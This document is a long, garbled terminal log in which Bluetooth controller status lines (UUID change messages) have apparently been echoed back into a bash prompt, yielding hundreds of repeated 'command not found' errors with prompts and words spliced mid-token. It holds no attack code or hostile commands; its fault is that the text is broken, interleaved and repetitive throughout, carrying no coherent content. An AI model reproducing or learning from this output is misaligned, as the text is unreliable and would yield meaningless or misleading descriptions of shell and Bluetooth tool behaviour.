hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001112-0000-1000-8000-00805f9b34fb +bash:bash: [CHG]: command not found +[goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +bbash: [CHG]: command not found +[goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +bbash:[goalador@gatanda hhneuauf.de]$ [CHGor@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb +bash: [CHGor@gatanda: command not found +[gsh: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +sh: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +alador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash:bash: [CHG]: command not found +bash: bash:bash:: command not found +da hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001112-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash:bash: [CHG]: command not found +bash: bash:bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bbash: [CHG]: command not found +bash: bbash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bbash:[goalador@gatanda hhneuauf.de]$ [CHGor@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fbbash: bbash:[goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [CHGor@gatanda: command not found +bash: bash:: command not found +[goalador@gatandhhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ sh: [goalador@gatanda: command not found +bash: sh:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ alador@gatanda: command not found +bash: alador@gatanda:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash:bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ da hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb +bash: da: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.dehhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ sh: [goalador@gatanda: command not found +bash: sh:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ alador@gatanda: command not found +bash: alador@gatanda:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash:bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ da hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb +bash: da: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.dehhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ sh: [goalador@gatanda: command not found +bash: sh:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ alador@gatanda: command not found +bash: alador@gatanda:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash:bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ da hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb +bash: da: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001112-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash:bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bbash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bbash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bbash:[goalador@gatanda hhneuauf.de]$ [CHGor@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fbbash: bbash:[goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHGor@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatandhhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatandhhneuauf.de]$: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ sh: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: sh:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ alador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: alador@gatanda:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash:bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ da hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: da: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.dehhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ sh: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: sh:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.dehhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ da hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: da: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001112-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash:bash: [CHG]: command not found +h:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +alador@gatanda: command not found +[goaladorbash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bbash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bbash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bbash:[goalador@gatanda hhneuauf.de]$ [CHGor@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fbbash: bbash:[goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHGor@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatandhhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatandhhneuauf.de]$: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found 